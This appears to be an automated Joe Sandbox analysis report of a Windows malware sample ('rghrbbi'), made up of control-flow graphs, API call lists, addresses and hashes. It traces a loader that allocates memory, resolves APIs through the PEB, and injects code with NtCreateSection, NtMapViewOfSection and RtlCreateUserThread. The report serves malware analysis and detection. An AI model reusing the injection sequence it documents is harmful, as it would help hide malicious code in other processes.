2988->2989 2991 2ba030b 2989->2991 2990 2ba0439 VirtualFree 2993 2ba04be LoadLibraryA 2990->2993 2991->2990 2994 2ba08c7 2993->2994 2996 2ba0223 2995->2996 2997 2ba0d90 2996->2997 2998 2ba0dad 2997->2998 2999 2ba0dbb GetPEB 2998->2999 3000 2ba0238 VirtualAlloc 2998->3000 2999->3000 3000->2988 3055 401606 3055->3055 3056 401609 3055->3056 3057 4016af NtDuplicateObject 3056->3057 3066 4017cb 3056->3066 3058 4016cc NtCreateSection 3057->3058 3057->3066 3059 4016f2 NtMapViewOfSection 3058->3059 3060 40174c NtCreateSection 3058->3060 3059->3060 3061 401715 NtMapViewOfSection 3059->3061 3062 401778 3060->3062 3060->3066 3061->3060 3063 401733 3061->3063 3064 401782 NtMapViewOfSection 3062->3064 3062->3066 3063->3060 3065 4017a9 NtMapViewOfSection 3064->3065 3064->3066 3065->3066 3153 2ba092b GetPEB 3154 2ba0972 3153->3154 3067 401613 3068 40161c 3067->3068 3069 4017cb 3068->3069 3070 4016af NtDuplicateObject 3068->3070 3070->3069 3071 4016cc NtCreateSection 3070->3071 3072 4016f2 NtMapViewOfSection 3071->3072 3073 40174c NtCreateSection 3071->3073 3072->3073 3074 401715 NtMapViewOfSection 3072->3074 3073->3069 3075 401778 3073->3075 3074->3073 3076 401733 3074->3076 3075->3069 3077 401782 NtMapViewOfSection 3075->3077 3076->3073 3077->3069 3078 4017a9 NtMapViewOfSection 3077->3078 3078->3069 3001 403257 3002 4031f0 RtlCreateUserThread NtTerminateProcess 3001->3002 3004 403261 3001->3004 3003 403246 3002->3003 3004->3004 3105 402ed9 3108 402e8d 3105->3108 3106 40304f 3107 4019e0 9 API calls 3107->3106 3108->3105 3108->3106 3108->3107 2911 2d29ff3 2912 2d2a002 2911->2912 2915 2d2a793 2912->2915 2916 2d2a7ae 2915->2916 2917 2d2a7b7 CreateToolhelp32Snapshot 2916->2917 2918 2d2a7d3 Module32First 2916->2918 2917->2916 2917->2918 2919 2d2a7e2 2918->2919 2920 2d2a00b 2918->2920 2922 2d2a452 2919->2922 2923 2d2a47d 2922->2923 2924 2d2a4c6 2923->2924 2925 2d2a48e VirtualAlloc 2923->2925 2924->2924 2925->2924 2926 415ba0 2929 4157a0 2926->2929 2928 415ba5 2930 4157ad 2929->2930 2931 415997 2930->2931 2932 415887 InterlockedCompareExchange ReadConsoleW FindAtomW GetConsoleMode SearchPathA 2930->2932 2933 4159a5 SetCommState 2931->2933 2937 4159be 2931->2937 2934 4158e1 7 API calls 2932->2934 2933->2931 2935 415981 PulseEvent 2934->2935 2936 415988 2934->2936 2935->2936 2936->2931 2938 415a88 2937->2938 2939 4159cb 7 API calls 2937->2939 2952 415410 LocalAlloc 2938->2952 2946 415a6b 2939->2946 2943 415a8d LoadLibraryA 2953 415440 GetModuleHandleW GetProcAddress VirtualProtect 2943->2953 2944 415add 2954 415710 2944->2954 2946->2938 2947 415ae2 2948 415b1d InterlockedDecrement 2947->2948 2949 415b33 2947->2949 2948->2947 2950 415b52 GetFileAttributesA 2949->2950 2951 415b62 2949->2951 2950->2949 2951->2928 2952->2943 2953->2944 2955 415739 QueryDosDeviceW 2954->2955 2956 41574a 2954->2956 2955->2956 2965 4155d0 2956->2965 2959 415765 2968 415610 2959->2968 2960 41575d FreeEnvironmentStringsA 2960->2959 2963 41577c HeapDestroy GetNumaProcessorNode 2964 41578e 2963->2964 2964->2947 2966 4155e1 FatalAppExitA GetModuleHandleA 2965->2966 2967 4155f3 2965->2967 2966->2967 2967->2959 2967->2960 2969 415645 2968->2969 2970 415634 BuildCommDCBA 2968->2970 2971 41564d WritePrivateProfileStringA FreeEnvironmentStringsA 2969->2971 2974 41566f 2969->2974 2970->2974 2971->2974 2972 4156dc 2972->2963 2972->2964 2974->2972 2975 4156a9 SetCalendarInfoW OpenJobObjectA GetShortPathNameW 2974->2975 2976 415600 2974->2976 2975->2974 2979 415590 2976->2979 2980 4155b9 2979->2980 2981 4155ac SetEvent 2979->2981 2980->2974 2981->2980 3155 4019eb 3156 4019f0 3155->3156 3157 401a29 Sleep 3156->3157 3158 4014fb HeapCreate 3157->3158 3159 401a44 3158->3159 3160 4015fb 7 API calls 3159->3160 3161 401a55 3159->3161 3160->3161 3031 415679 3032 415680 3031->3032 3033 415600 SetEvent 3032->3033 3034 4156a9 SetCalendarInfoW OpenJobObjectA GetShortPathNameW 3032->3034 3035 4156dc 3032->3035 3033->3032 3034->3032 3109 4014fa 3110 40150c HeapCreate 3109->3110 3005 402fbe 3007 402fc3 3005->3007 3008 40304f 3007->3008 3009 4019e0 3007->3009 3010 4019e7 3009->3010 3011 401a29 Sleep 3010->3011 3016 4014fb 3011->3016 3013 401a44 3014 4015fb 7 API calls 3013->3014 3015 401a55 3013->3015 3014->3015 3015->3008 3017 40150c HeapCreate 3016->3017

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 4157a0-4157c8 2 4157d0-4157d7 0->2 3 4157d9-4157db 2->3 4 4157df-4157e5 2->4 3->4 5 4157e7-4157f1 4->5 6 4157f6-415800 4->6 5->6 7 415802-415831 6->7 8 41583b-415842 6->8 7->8 8->2 9 415844-41584c 8->9 11 415850-415856 9->11 12 415864-41586b 11->12 13 415858-41585e 11->13 14 415871-415878 12->14 15 41586d 12->15 13->12 14->11 16 41587a-415881 14->16 15->14 17 415997-4159a3 16->17 18 415887-41597f InterlockedCompareExchange ReadConsoleW FindAtomW GetConsoleMode SearchPathA GetDefaultCommConfigA MoveFileW GetVersionExW DisconnectNamedPipe ReadConsoleOutputW GetModuleFileNameA GetSystemTimeAdjustment 16->18 19 4159a5-4159b3 SetCommState 17->19 22 415981-415982 PulseEvent 18->22 23 415988-415994 18->23 24 4159b5-4159bc 19->24 25 4159be-4159c5 19->25 22->23 23->17 24->19 24->25 26 415a88-415a97 call 415410 25->26 27 4159cb-415a85 GetConsoleAliasesLengthW GetStringTypeExW GetComputerNameW GetTimeFormatW GetFileAttributesA GetConsoleAliasExesLengthA GetBinaryType 25->27 33 415a99-415aaa 26->33 34 415acd-415ad8 LoadLibraryA call 415440 26->34 27->26 35 415ab0-415ac0 33->35 40 415add-415aee call 415710 34->40 38 415ac2 35->38 39 415ac8-415acb 35->39 38->39 39->34 39->35 44 415af0-415af7 40->44 46 415b07-415b0d 44->46 47 415af9-415b03 44->47 48 415b14-415b1b 46->48 49 415b0f call 415430 46->49 47->46 52 415b2a-415b31 48->52 53 415b1d-415b24 InterlockedDecrement 48->53 49->48 52->44 55 415b33-415b3d 52->55 53->52 56 415b40-415b50 55->56 57 415b52-415b57 GetFileAttributesA 56->57 58 415b5d-415b60 56->58 57->58 58->56 59 415b62-415b6d 58->59 60 415b70-415b75 59->60 61 415b77-415b7d 60->61 62 415b7f-415b85 60->62 61->62 63 415b87-415b94 61->63 62->60 62->63
                                                              APIs
                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415892
                                                              • ReadConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041589F
                                                              • FindAtomW.KERNEL32(00000000), ref: 004158A6
                                                              • GetConsoleMode.KERNEL32(00000000,00000000), ref: 004158AE
                                                              • SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 004158C6
                                                              • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 004158ED
                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 004158F5
                                                              • GetVersionExW.KERNEL32(?), ref: 00415902
                                                              • DisconnectNamedPipe.KERNEL32(?), ref: 00415915
                                                              • ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 0041595A
                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415969
                                                              • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00415972
                                                              • PulseEvent.KERNEL32(00000000), ref: 00415982
                                                              • SetCommState.KERNELBASE(00000000,00000000), ref: 004159A9
                                                              • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 004159DA
                                                              • GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 004159EB
                                                              • GetComputerNameW.KERNEL32(?,?), ref: 004159FF
                                                              • GetTimeFormatW.KERNEL32(00000000,00000000,?,004173C0,?,00000000), ref: 00415A3F
                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00415A46
                                                              • GetConsoleAliasExesLengthA.KERNEL32 ref: 00415A4C
                                                              • GetBinaryType.KERNEL32(004173D8,?), ref: 00415A5E
                                                              • LoadLibraryA.KERNELBASE(004173E8), ref: 00415AD2
                                                              • InterlockedDecrement.KERNEL32(?), ref: 00415B24
                                                              • GetFileAttributesA.KERNEL32(004173F4), ref: 00415B57
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2703620678.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_40b000_rghrbbi.jbxd
                                                              Similarity
                                                              • API ID: Console$File$AttributesCommInterlockedLengthNameReadTimeType$AdjustmentAliasAliasesAtomBinaryCompareComputerConfigDecrementDefaultDisconnectEventExchangeExesFindFormatLibraryLoadModeModuleMoveNamedOutputPathPipePulseSearchStateStringSystemVersion
                                                              • String ID: k`$}$
                                                              • API String ID: 723190256-956986773
                                                              • Opcode ID: ffc5916c62f963363484ba31e8fd33b3cf82dd6137713916bc385b3e4e69cfa4
                                                              • Instruction ID: 3bf9ffe576a9fbcecb19cba34f73af1320b210f32c47b7a0ffd63e7749ed94fc
                                                              • Opcode Fuzzy Hash: ffc5916c62f963363484ba31e8fd33b3cf82dd6137713916bc385b3e4e69cfa4
                                                              • Instruction Fuzzy Hash: 17A1D071941624DFC724DB61DC48EDB7B79EF8D350F0180AAF609A7250DB385A81CFA9

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 150 4014fb-401504 151 40151b 150->151 152 40150c-401531 150->152 151->152 158 401542 HeapCreate 152->158
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
                                                              • Instruction ID: 8456862ab07ee4fd5df19115d19177d22808884b2e91bbb4bd05fd593ecc01b1
                                                              • Opcode Fuzzy Hash: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
                                                              • Instruction Fuzzy Hash: CFA1E3B1604215BFDF218F95CC45FAB7BB8EF82710F14006BE942BB1E1D6399902DB5A

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 160 4015fb-401604 161 401615 160->161 162 40160b-401611 160->162 161->162 163 401618-40162c 161->163 162->163 167 401643 163->167 168 401634-401659 call 40127e 163->168 167->168 173 40165b 168->173 174 40165e-401663 168->174 173->174 176 401989-401991 174->176 177 401669-40167a 174->177 176->174 182 401996-4019dd call 40127e 176->182 180 401680-4016a9 177->180 181 401987 177->181 180->181 190 4016af-4016c6 NtDuplicateObject 180->190 181->182 190->181 192 4016cc-4016f0 NtCreateSection 190->192 194 4016f2-401713 NtMapViewOfSection 192->194 195 40174c-401772 NtCreateSection 192->195 194->195 197 401715-401731 NtMapViewOfSection 194->197 195->181 198 401778-40177c 195->198 197->195 200 401733-401749 197->200 198->181 201 401782-4017a3 NtMapViewOfSection 198->201 200->195 201->181 203 4017a9-4017c5 NtMapViewOfSection 201->203 203->181 204 4017cb call 4017d0 203->204
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                              • Instruction ID: eff60cd738278fe88036fd12be8a847ac689736a027776baabbfcbb81c570d02
                                                              • Opcode Fuzzy Hash: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
                                                              • Instruction Fuzzy Hash: 20512DB4900205BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759945CB64

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 208 401613-40162c 212 401643 208->212 213 401634-401659 call 40127e 208->213 212->213 218 40165b 213->218 219 40165e-401663 213->219 218->219 221 401989-401991 219->221 222 401669-40167a 219->222 221->219 227 401996-4019dd call 40127e 221->227 225 401680-4016a9 222->225 226 401987 222->226 225->226 235 4016af-4016c6 NtDuplicateObject 225->235 226->227 235->226 237 4016cc-4016f0 NtCreateSection 235->237 239 4016f2-401713 NtMapViewOfSection 237->239 240 40174c-401772 NtCreateSection 237->240 239->240 242 401715-401731 NtMapViewOfSection 239->242 240->226 243 401778-40177c 240->243 242->240 245 401733-401749 242->245 243->226 246 401782-4017a3 NtMapViewOfSection 243->246 245->240 246->226 248 4017a9-4017c5 NtMapViewOfSection 246->248 248->226 249 4017cb call 4017d0 248->249
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                              • Instruction ID: 5fe8c3412efddb1af6587580d34f391b5aa6f3f620f4969ff4058e4fba2aebcc
                                                              • Opcode Fuzzy Hash: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                              • Instruction Fuzzy Hash: 385129B5900245BBEF218F91CC48FEFBBB8EF86B00F144169F911AA2A5D7719905CB64

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 253 401606-401607 253->253 254 401609 253->254 255 40160b-40162c 254->255 256 40163c-401659 call 40127e 254->256 266 401643 255->266 267 401634-401639 255->267 264 40165b 256->264 265 40165e-401663 256->265 264->265 269 401989-401991 265->269 270 401669-40167a 265->270 266->267 267->256 269->265 275 401996-4019dd call 40127e 269->275 273 401680-4016a9 270->273 274 401987 270->274 273->274 283 4016af-4016c6 NtDuplicateObject 273->283 274->275 283->274 285 4016cc-4016f0 NtCreateSection 283->285 287 4016f2-401713 NtMapViewOfSection 285->287 288 40174c-401772 NtCreateSection 285->288 287->288 290 401715-401731 NtMapViewOfSection 287->290 288->274 291 401778-40177c 288->291 290->288 293 401733-401749 290->293 291->274 294 401782-4017a3 NtMapViewOfSection 291->294 293->288 294->274 296 4017a9-4017c5 NtMapViewOfSection 294->296 296->274 297 4017cb call 4017d0 296->297
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd
                                                              Similarity
                                                              • API ID: Section$CreateDuplicateObjectView
                                                              • String ID:
                                                              • API String ID: 1652636561-0
                                                              • Opcode ID: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                              • Instruction ID: 18644dced9cd2caf62a4109051f94e3e0c196277adac1f1b80d81581f0248fb5
                                                              • Opcode Fuzzy Hash: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                              • Instruction Fuzzy Hash: 95512AB4900245BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759941CB64

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 301 401627-40162c 305 401643 301->305 306 401634-401659 call 40127e 301->306 305->306 311 40165b 306->311 312 40165e-401663 306->312 311->312 314 401989-401991 312->314 315 401669-40167a 312->315 314->312 320 401996-4019dd call 40127e 314->320 318 401680-4016a9 315->318 319 401987 315->319 318->319 328 4016af-4016c6 NtDuplicateObject 318->328 319->320 328->319 330 4016cc-4016f0 NtCreateSection 328->330 332 4016f2-401713 NtMapViewOfSection 330->332 333 40174c-401772 NtCreateSection 330->333 332->333 335 401715-401731 NtMapViewOfSection 332->335 333->319 336 401778-40177c 333->336 335->333 338 401733-401749 335->338 336->319 339 401782-4017a3 NtMapViewOfSection 336->339 338->333 339->319 341 4017a9-4017c5 NtMapViewOfSection 339->341 341->319 342 4017cb call 4017d0 341->342
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
                                                              • Instruction ID: 9010f4212e2f095ee6e1513bebcb31b7ed322fe9e8888bc62802b8a5d7df5652
                                                              • Opcode Fuzzy Hash: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
                                                              • Instruction Fuzzy Hash: 795128B4900249BBEF208F91CC48FAFBBB8EF85B00F140169F911BA2A5D7759941CB64

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 346 401641-401659 call 40127e 353 40165b 346->353 354 40165e-401663 346->354 353->354 356 401989-401991 354->356 357 401669-40167a 354->357 356->354 362 401996-4019dd call 40127e 356->362 360 401680-4016a9 357->360 361 401987 357->361 360->361 370 4016af-4016c6 NtDuplicateObject 360->370 361->362 370->361 372 4016cc-4016f0 NtCreateSection 370->372 374 4016f2-401713 NtMapViewOfSection 372->374 375 40174c-401772 NtCreateSection 372->375 374->375 377 401715-401731 NtMapViewOfSection 374->377 375->361 378 401778-40177c 375->378 377->375 380 401733-401749 377->380 378->361 381 401782-4017a3 NtMapViewOfSection 378->381 380->375 381->361 383 4017a9-4017c5 NtMapViewOfSection 381->383 383->361 384 4017cb call 4017d0 383->384
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
                                                              • Instruction ID: 9e1831f0ceb5ee828940fa86c31e9463c4dc41faf1b0eb7057c6f8c584aa9f8c
                                                              • Opcode Fuzzy Hash: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
                                                              • Instruction Fuzzy Hash: 2A5109B5900249BFEF208F91CC48FEFBBB8EF86B00F104159F911AA2A5D7719945CB64

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 389 403103-403127 390 403246-40324b 389->390 391 40312d-403145 389->391 391->390 392 40314b-40315c 391->392 393 40315e-403167 392->393 394 40316c-40317a 393->394 394->394 395 40317c-403183 394->395 396 4031a5-4031ac 395->396 397 403185-4031a4 395->397 398 4031ce-4031d1 396->398 399 4031ae-4031cd 396->399 397->396 400 4031d3-4031d6 398->400 401 4031da 398->401 399->398 400->401 402 4031d8 400->402 401->393 403 4031dc-4031e1 401->403 402->403 403->390 404 4031e3-4031e6 403->404 404->390 405 4031e8-403243 RtlCreateUserThread NtTerminateProcess 404->405 405->390
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd
                                                              Similarity
                                                              • API ID: CreateProcessTerminateThreadUser
                                                              • String ID:
                                                              • API String ID: 1921587553-0
                                                              • Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                              • Instruction ID: dae095e867f3745097cc185a7748a697303a2d44691d7cc8a0ebaf8866640ae2
                                                              • Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                              • Instruction Fuzzy Hash: BB415832618E0C8FD768EE6CA8896A377D6E798351B1643BAD808D7384EE30D85183C5

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 407 403257-40325f 408 4031f0-403243 RtlCreateUserThread NtTerminateProcess 407->408 409 403261-40327f 407->409 411 403246-40324b 408->411 415 403281 409->415 416 403286-403290 409->416 415->416 417 403283-403285 415->417 418 403292 416->418 419 403298-4032ba call 4012ec 416->419 417->416 418->419 420 403293-403297 418->420 425 4032be 419->425 425->425
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd
                                                              Similarity
                                                              • API ID: CreateProcessTerminateThreadUser
                                                              • String ID:
                                                              • API String ID: 1921587553-0
                                                              • Opcode ID: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
                                                              • Instruction ID: ab58b7d6b66510dde6bc1fc7e766791280fd84229bd7d6ef16cc780df24ac814
                                                              • Opcode Fuzzy Hash: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
                                                              • Instruction Fuzzy Hash: FC1156B181C6448FE714DF78A44A23A7FE4E754326F2407BFD446E12D1D63C8246824B

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 65 2ba003c-2ba0047 66 2ba0049 65->66 67 2ba004c-2ba0263 call 2ba0a3f call 2ba0e0f call 2ba0d90 VirtualAlloc 65->67 66->67 82 2ba028b-2ba0292 67->82 83 2ba0265-2ba0289 call 2ba0a69 67->83 85 2ba02a1-2ba02b0 82->85 87 2ba02ce-2ba03c2 VirtualProtect call 2ba0cce call 2ba0ce7 83->87 85->87 88 2ba02b2-2ba02cc 85->88 94 2ba03d1-2ba03e0 87->94 88->85 95 2ba0439-2ba04b8 VirtualFree 94->95 96 2ba03e2-2ba0437 call 2ba0ce7 94->96 98 2ba04be-2ba04cd 95->98 99 2ba05f4-2ba05fe 95->99 96->94 101 2ba04d3-2ba04dd 98->101 102 2ba077f-2ba0789 99->102 103 2ba0604-2ba060d 99->103 101->99 105 2ba04e3-2ba0505 101->105 106 2ba078b-2ba07a3 102->106 107 2ba07a6-2ba07b0 102->107 103->102 108 2ba0613-2ba0637 103->108 117 2ba0517-2ba0520 105->117 118 2ba0507-2ba0515 105->118 106->107 109 2ba086e-2ba08be LoadLibraryA 107->109 110 2ba07b6-2ba07cb 107->110 111 2ba063e-2ba0648 108->111 116 2ba08c7-2ba08f9 109->116 113 2ba07d2-2ba07d5 110->113 111->102 114 2ba064e-2ba065a 111->114 119 2ba07d7-2ba07e0 113->119 120 2ba0824-2ba0833 113->120 114->102 115 2ba0660-2ba066a 114->115 121 2ba067a-2ba0689 115->121 123 2ba08fb-2ba0901 116->123 124 2ba0902-2ba091d 116->124 125 2ba0526-2ba0547 117->125 118->125 126 2ba07e2 119->126 127 2ba07e4-2ba0822 119->127 122 2ba0839-2ba083c 120->122 128 2ba068f-2ba06b2 121->128 129 2ba0750-2ba077a 121->129 122->109 130 2ba083e-2ba0847 122->130 123->124 131 2ba054d-2ba0550 125->131 126->120 127->113 134 2ba06ef-2ba06fc 128->134 135 2ba06b4-2ba06ed 128->135 129->111 136 2ba084b-2ba086c 130->136 137 2ba0849 130->137 132 2ba05e0-2ba05ef 131->132 133 2ba0556-2ba056b 131->133 132->101 139 2ba056f-2ba057a 133->139 140 2ba056d 133->140 141 2ba074b 134->141 142 2ba06fe-2ba0748 134->142 135->134 136->122 137->109 143 2ba059b-2ba05bb 139->143 144 2ba057c-2ba0599 139->144 140->132 141->121 142->141 149 2ba05bd-2ba05db 143->149 144->149 149->131
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02BA024D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2705859376.0000000002BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_2ba0000_rghrbbi.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID: cess$kernel32.dll
                                                              • API String ID: 4275171209-1230238691
                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
